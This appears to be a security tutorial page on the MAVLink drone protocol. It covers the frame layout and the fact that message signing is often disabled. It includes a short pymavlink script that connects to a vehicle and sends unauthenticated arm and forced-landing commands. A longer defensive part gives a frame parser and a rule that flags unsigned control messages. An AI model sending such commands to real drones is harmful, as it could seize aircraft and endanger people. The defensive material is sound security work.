MAVLink Protocol

Protocol

MAVLink is the standard protocol for ArduPilot and PX4 drones. It handles telemetry, commands, and mission uploads - often without authentication.

MAVLink Message Structure

mavlink-frame.txt
text
MAVLink v2 Frame:

+-----+-----+-----+-----+--------+--------+---------+------+-------+
| STX | LEN | SEQ | SYS | COMP   | MSG ID | PAYLOAD | CRC  | SIG   |
| FD  |     |     | ID  | ID     | (3B)   |         | (2B) | (13B) |
+-----+-----+-----+-----+--------+--------+---------+------+-------+

Common message types:
- HEARTBEAT (0): System alive indicator
- SET_MODE (11): Change flight mode
- COMMAND_LONG (76): Execute command
- MISSION_ITEM (39): Waypoint data
- RC_CHANNELS_OVERRIDE (70): Override RC input

MAVLink Exploitation

mavlink-exploit.py
python
# pymavlink - Python MAVLink library (install first with: pip install pymavlink)

from pymavlink import mavutil

# Connect to a telemetry radio on a serial port ...
conn = mavutil.mavlink_connection('/dev/ttyUSB0', baud=57600)

# ... or over UDP (use one of the two connections, not both)
conn = mavutil.mavlink_connection('udp:127.0.0.1:14550')

# Wait for heartbeat
conn.wait_heartbeat()
print(f"System {conn.target_system} Component {conn.target_component}")

# Arm the vehicle (dangerous!)
conn.mav.command_long_send(
    conn.target_system, conn.target_component,
    mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
    0, 1, 0, 0, 0, 0, 0, 0
)

# Force landing
conn.mav.command_long_send(
    conn.target_system, conn.target_component,
    mavutil.mavlink.MAV_CMD_NAV_LAND,
    0, 0, 0, 0, 0, 0, 0, 0
)

No Auth by Default

MAVLink v2 supports message signing but it's often disabled. Unsigned connections accept commands from any source.
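A receiver-side decoder for the frame layout above, added here as an example (not code from this page or from pymavlink): it verifies the frame CRC and alerts on any unsigned frame carrying one of the control messages listed earlier, which is exactly what an unsigned link will accept. The real v2 header also carries INCOMPAT_FLAGS and COMPAT_FLAGS bytes between LEN and SEQ (omitted in the diagram above); the "signed" bit is bit 0 of INCOMPAT_FLAGS. CRC_EXTRA values are the ones from common.xml; the sample arm payload and the sysid/compid values are constructed for the example.

```python
import struct

STX_V2 = 0xFD
IFLAG_SIGNED = 0x01   # incompat_flags bit 0: a 13-byte signature follows the CRC
HEADER_LEN = 10       # STX LEN INCOMPAT_FLAGS COMPAT_FLAGS SEQ SYSID COMPID MSGID(3)
CRC_EXTRA = {0: 50, 76: 152}  # per-message CRC seed from common.xml (HEARTBEAT, COMMAND_LONG)
# Message ids from the list above that change vehicle behaviour and so deserve a signature.
CONTROL_MSGS = {11: "SET_MODE", 39: "MISSION_ITEM", 70: "RC_CHANNELS_OVERRIDE", 76: "COMMAND_LONG"}
# Constructed COMMAND_LONG payload (param1..7, command, target_sys, target_comp, confirmation):
# MAV_CMD_COMPONENT_ARM_DISARM (400) with param1=1, the same "arm" command shown on this page.
ARM_PAYLOAD = struct.pack("<7fHBBB", 1, 0, 0, 0, 0, 0, 0, 400, 1, 1, 0)


def x25_crc(data: bytes, crc_extra: int) -> int:
    """MAVLink CRC-16/X.25 over every byte after STX, then the message's CRC_EXTRA byte."""
    crc = 0xFFFF
    for b in data + bytes([crc_extra]):
        tmp = (b ^ (crc & 0xFF)) & 0xFF
        tmp = (tmp ^ (tmp << 4)) & 0xFF
        crc = ((crc >> 8) ^ (tmp << 8) ^ (tmp << 3) ^ (tmp >> 4)) & 0xFFFF
    return crc

def parse_frame(frame: bytes) -> dict:
    """Split a v2 frame into header fields, verify the CRC and note whether it is signed."""
    if len(frame) < HEADER_LEN + 2 or frame[0] != STX_V2:
        raise ValueError("not a MAVLink v2 frame")
    length, incompat, _compat, seq, sysid, compid = frame[1:7]
    msgid = int.from_bytes(frame[7:10], "little")
    crc_pos = HEADER_LEN + length
    (crc,) = struct.unpack_from("<H", frame, crc_pos)
    if msgid in CRC_EXTRA and x25_crc(frame[1:crc_pos], CRC_EXTRA[msgid]) != crc:
        raise ValueError("CRC mismatch: corrupted or tampered frame")
    signed = bool(incompat & IFLAG_SIGNED)
    if signed and len(frame) < crc_pos + 2 + 13:
        raise ValueError("signed flag set but 13-byte signature missing")
    return {"seq": seq, "sysid": sysid, "compid": compid, "msgid": msgid,
            "payload": frame[HEADER_LEN:crc_pos], "signed": signed}

def classify(frame: bytes) -> str:
    """Detection rule: an unsigned frame carrying a control message is the case to alert on."""
    f = parse_frame(frame)
    name = CONTROL_MSGS.get(f["msgid"])
    if name and not f["signed"]:
        return f"ALERT unsigned {name} from sysid={f['sysid']} compid={f['compid']}"
    return "ok"

def build_frame(msgid: int, payload: bytes, seq: int = 0, sysid: int = 255, compid: int = 190) -> bytes:
    """Test helper: build an unsigned v2 frame (sysid 255 / compid 190 is a typical GCS identity)."""
    body = bytes([len(payload), 0, 0, seq, sysid, compid]) + msgid.to_bytes(3, "little") + payload
    return bytes([STX_V2]) + body + struct.pack("<H", x25_crc(body, CRC_EXTRA[msgid]))
```

Feeding the output of a telemetry capture through classify() gives a quick picture of how many behaviour-changing commands a link accepts without a signature; enabling v2 signing on both ends turns the ALERT lines into "ok".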